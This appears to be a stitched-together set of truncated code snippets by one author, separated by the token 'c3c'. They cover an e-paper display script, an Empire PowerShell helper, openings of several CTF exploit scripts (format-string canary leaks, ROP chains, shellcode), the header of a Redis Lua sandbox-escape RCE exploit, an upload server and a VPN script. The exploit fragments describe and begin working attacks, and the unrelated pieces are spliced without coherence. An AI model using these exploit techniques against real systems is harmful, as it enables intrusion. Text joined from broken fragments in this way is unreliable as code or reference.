c3c

# Snipppet for a T8-C3 driving a WaveShare 7.3in ACeP epaper display 
# Retrieves pictures from wifi and stream them to the display
# Pictures must be preformatted in GS4_HMSB format
# Updates screen every 4 hours with a new picture

from machine import deepsleep, Pin, SPI
import time
import network
import requests
import random

c3c

from base64 import b64decode,b64encode
from struct import pack,unpack
from binascii import hexlify
import sys

def u32(x): return unpack(">I", x)[0]
def p32(x): return pack(">I", x)

hash = b64decode(sys.argv[1]).replace(b"-",b"")

c3c

# Invoke-ZipFolder from https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/zipfolder.py
# also works on older PowerShell versions, worrying though that it displays a dialog, see https://github.com/EmpireProject/Empire/issues/135

function Invoke-ZipFolder
{
    param([string]$Folder, [string]$ZipFileName)
    if (-not (Test-Path $Folder)) {
        "Target folder $Folder doesn't exist."
        return
    }

c3c

# solution for HackIT CTF 2017 pwn200 challenge
# my first ARM exploit :0
# binary is NX + ASLR enabled on the server
# there's a format string vulnerability as well as a buffer overflow
# we can obtain the stack canary through the format string, then perform the overflow.
# since NX is enabled, we have to ROP our way to a shell
# - c3c

from pwn import *
context.arch = 'arm'

c3c

## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c

## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version

c3c

from pwn import *
from Crypto.Cipher import AES

r = remote("challenges.hackover.h4q.it", 1415)

def decr(key, roll):
	return u16(AES.new(key).decrypt(roll)[:2], endian="big")

for i in range(32):
	r.recvuntil("My dice roll: ")

c3c

from pwn import *

# the binary reverses our payload and checks for a number of bad bytes
# generated a ropchain and modified it to work

def ropchain():
	# modified ropchain generated with ropper
	# ropper's badbytes option didnt work correctly...

	from struct import pack

c3c

from pwn import *

context.os = 'linux'
context.arch = "amd64"

#r = process("./bookshellf")
r = remote("challenges.hackover.h4q.it", 31337)

# using the book 'seek' function we can read past the array boundary and leak memory
# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)

c3c

#!/usr/bin/env python

"""Simple HTTP Server With Upload.

This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.

"""

c3c

#!/bin/sh
##
## netscreen/jnpr ssl vpn connection magic
## [email protected] / @oogali
##
## i wrote this about a year ago (2009), when i had continuous access
## to a jnpr ssl vpn box and had to connect via it.
##
## if bits of this script are broken, i'll be glad to fix if someone
## gives me client access to a ssl vpn box to test against.